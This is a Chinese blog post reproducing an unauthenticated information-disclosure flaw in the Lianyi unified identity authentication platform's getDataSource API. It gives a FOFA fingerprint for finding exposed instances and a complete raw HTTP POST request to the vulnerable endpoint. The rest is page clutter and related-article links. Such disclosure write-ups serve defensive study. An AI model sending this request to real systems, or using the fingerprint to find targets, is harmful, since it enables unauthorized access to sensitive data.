【漏洞复现】联奕统一身份认证平台getDataSource存在信息泄露漏洞

已于 2024-03-28 17:27:16 修改
阅读量608 收藏 3
点赞数 3
分类专栏: 漏洞复现 文章标签: web安全 网络安全
于 2024-03-28 17:26:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40550150/article/details/137118785
版权

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

联奕统一身份认证平台 getDataSource 未授权访问,攻击者可通过此漏洞获取敏感信息。

二、影响版本

联奕统一身份认证平台

三、资产测绘

  • fofa:icon_hash="772658742"
  • 特征

image-20240326234635891

四、漏洞复现

POST /api/bd-mdp/serviceManager/outInterface/getDataSource HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Transfer-Encoding: chunked
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

0

image-20240326234137810

E_cho234
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】用友GRP-A++-selectdatasourceinfo-未授权
知黑而守白
01-26 181
用友政务GRP-A++综合计划财务产品,以“平台化应用、智能化管控、专业化服务”为技术、服务理念,以独创的面向“岗位角色”产品定义思想,综合利用JAVA、智能表单、工作流及最新的互联网、云计算、移动应用等先进技术;融合部门综合计划财务管理领域内的预算编报与分配、预算执行控制、资金计划审批、财务报销、合同支付、集中核算、汇总报表、财务监督、领导查询决策,以及财务服务、移动审批等应用共同构成了GRP-A++综合计划财务管理软件平台软件产品。
漏洞复现联奕统一身份认证平台getDataSource未授权访问漏洞
qq_34780861的博客
03-19 574
联奕统一信息门户平台(LYASP_v3.0)定位于对数字校园中的信息和应用系统进行整合,统一控制用户对信息和应用系统的访问,利用统一身份认证系统,为用户提供一个单一的访问入口(SSO)。
身份验证绕过漏洞分析
kali_Ma的博客
08-28 1629
0x01 前言 最近Tenable 披露了Arcadyna 网络设备身份验证绕过漏洞,并且很多的厂商都采用产生漏洞的组件,由于Arcadyan 设备固件厂商并没有开源出来,在官网支持里面下载的文件是window和linux 下和设备连接的客户端软件,无法对漏洞点开展分析,这里我们使用同样受影响的华硕产品DSL-AC3100 的固件来进行设备分析。并且复现在网络设备中网络检测ping 功能的远程命令执行漏洞,从而开启设备telentd。 0x02 华硕DSL-AC3100 固件 我们从华硕的官网中下载固件。
统一身份认证系统的简单看法
热门推荐
Enweitech Software Works
08-17 2万+
【事件背景】洋葱服务为什么没被成功接盘?_搜狐科技_搜狐网 https://www.sohu.com/a/124452755_354899 今天无意中看到这则新闻,发现人家洋葱认证服务已经停运1年多啦,瞬时伤心,免费的验证服务终究不会长久。 洋葱的创始人 也就是dnspod创始人 给我们免费的认证验证 说没就没了  转而现在都是付费的IAM或者其他CAS认证系统 基于此,笔者就来说说企业开发...
web渗透测试----11、身份认证漏洞
七天
03-10 5023
文章目录一、什么是身份认证?1、身份认证三要素:2、身份认证和授权的区别:二、身份验证漏洞如何产生?三、身份认证常见的漏洞一、基于密码的登录漏洞1、密码破解2、用户名猜解3、用户名枚举4、目前防止暴力攻击的最常见方法是:二、双因子身份验证中的漏洞1、绕过双因子验证2、双因子验证逻辑错误3、暴力破解2FA验证码三、其他身份验证机制中的漏洞1、保持用户登录状态2、重置用户密码四、身份认证相关漏洞的防御 一、什么是身份认证身份认证是验证给定用户或客户端身份的过程。简单理解就是如何让别人相信你就是你。 1、
ric-datasource:Rightech物联网平台的Grafana数据源
05-22
用于从RighTech IoT平台接收遥测入门指南 git clone https://github.com/Rightech/ric-datasource.git /var/lib/grafana/plugins/ric-datasource添加一个新的数据源打开 通过GitHub或Google进行身份验证创建令牌 ...
ovh-warp10-datasource:用于Warp10平台的Grafana数据源
05-17
sudo grafana-cli plugins install ovh-warp10-datasource installing ovh-warp10-datasource @ 2.2.0 from: https://grafana.com/api/plugins/ovh-warp10-datasource/versions/2.2.0/download into: /var/lib/...
datasphere-datasource:统一的数据源连接器
05-26
数据层数据源 统一的数据源连接器
java设置Sping的dataSource的参数信息
09-21
用java设置Srping的dataSource数据库连接属性,通过读取分离的配置文件
SpringBoot使用编程方式配置DataSource的方法
08-26
使用编程方式配置SpringBoot的DataSource SpringBoot框架提供了多种方式来配置DataSource,本文主要介绍使用编程方式配置DataSource的方法。这种方法可以让开发者拥有更高级别的控制权,忽略自动配置过程,从而实现...
网络安全网络安全威胁及途径
衍生星球的博客
06-17 212
目前,网络的主要应用包括:电子商务、网上银行、股票、证券、期货交易、即时通信、邮件、网游、下载文件或点击链接等,这些应用都存在大量的安全威胁和隐患。网络安全管理中出现的漏洞和疏忽都属于人为因素,网络安全中最突出的问题是缺乏完善的法律法规、管理准则规范和制度、网络安全组织机构及人员,不够重视或缺少安全检测及实时有效的监控、维护和审计。网络安全的威胁和风险主要涉及网络系统研发、结构、层次、范畴、应用和管理等,要做好网络安全防范,必须进行认真深入的调研、分析和研究,以解决网络系统的安全风险及隐患。
CVE-2018-8120漏洞提权:Windows 7的安全剖析与实战应用
最新发布
weixin_43822401的博客
06-24 307
CVE-2018-8120是一个Windows 7操作系统的本地权限提升漏洞。攻击者利用此漏洞,可以在目标系统上执行提权操作,从而获得更高级别的访问权限。
网络安全(补充)
m0_62207482的博客
06-15 688
物理安全威胁一般分为自然安全威胁和人为安全威胁。自然安全威胁包括地震、洪水、火灾、鼠害、雷电;;;;人为安全威胁包括盗窃、爆炸、毁坏、硬件安全 防火墙白名单策略:只允许符合安全规则的包通过防火墙,其他通信包禁止 防火墙名单策略:禁止与安全规则相冲突的包通过防火墙,其他通信包都允许 将入侵检测系统置于防火墙内部,使得很多对网络的攻击首先被防火墙过滤,也就是防火墙是首当其冲的,从而减少了对内部入侵检测系统的干扰,提高入侵检测系统的准确率,但是其检测能力不会变化 通过VPN技术,企业可以在远程用户、分
网络安全之Windows提权(上篇)(高级进阶)
weixin_70911257的博客
06-21 996
提权顾名思义就是提升我们的权限能够让我们去做更多的事,就好比皇帝跟大臣,很多事情只有皇帝能做,大臣做不了例如拟圣旨,掌管虎符,拥有所有人的生杀大权,我们提权的目的就是当皇帝,皇帝做的我们也能做。说一下我的渗透思路吧,首先通过对方服务器的各种漏洞将我们的一句话木马上传至对方的服务器然后通过各种渗透工具连接服务器拿到基本的shell权限,然后将权限提升至基本用户权限,再通过对方补丁漏洞提升至最高权限。
湘潭大学软件工程信息网络安全复习笔记最后一篇
学习记录
06-24 664
考试顺利通过!
网络安全练气篇——OWASP TOP 10
weixin_55762309的博客
06-13 1278
OWASP(开放式Web应用程序安全项目)是一个开放的社区,由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放,旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。
网络安全的神秘世界】搭建dvwa靶场
weixin_54750312的博客
06-24 462
打开 PHPStudy,创建数据库(必须与刚刚config文件中的配置保持一致)此时用户名为 admin,密码为 password,点击 login 登录。输入当时设置好的用户名和密码,我设置的是dvwa和123456。还是打开 config.inc.php文件找到以下两个参数。修改用户名和密码后以config.inc.php命名文件。将下载好的DVWA解压到phpstudy网站根目录下。打开 PHPStudy 选择网站,点击创建网站。打开config.inc.php.dist。从管理中打开dvwa网页。
访问外网的安全保障——反向沙箱
Canon_YK的博客
06-21 279
目前许多安全厂家因为使用的需求,进而研制出反向沙盒,其中深信达SPN(Sandbox Proxy Network)安全上网解决方案,是直接把终端传统外网物理断开,然后在内网中部署一个沙盒安全上网网关主机,在需要访问外网的终端上安装一个沙盒,当需要访问互联网的时候,在这个隔离沙盒内访问互联网。然而,需要注意的是,虽然反向沙箱为我们提供了强大的网络安全防护能力,但它并非万能的解决方案。由此可见,反向沙箱的运行逻辑是和正常的沙箱是相反的,只能通过沙盒的安全空间以及网关上的设置使得上外网只能通过改途径。
getDataSource()
12-18
根据提供的引用内容,无法确定`getDataSource()`具体指的是哪个方法或类的方法。但是可以根据引用内容推测出一些相关信息。 根据引用中提到的`DynamicDatasourceHolder.setDataSource()`方法,可以猜测这是一个动态数据源的实现方式。在这种情况下,`getDataSource()`可能是一个用于获取当前数据源的方法。但是,具体实现方式需要查看代码才能确定。 根据引用中提到的动态数据源注解,可以猜测这是一种更加方便的动态数据源实现方式。在这种情况下,`getDataSource()`可能是一个用于获取当前数据源的方法。但是,具体实现方式需要查看代码才能确定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值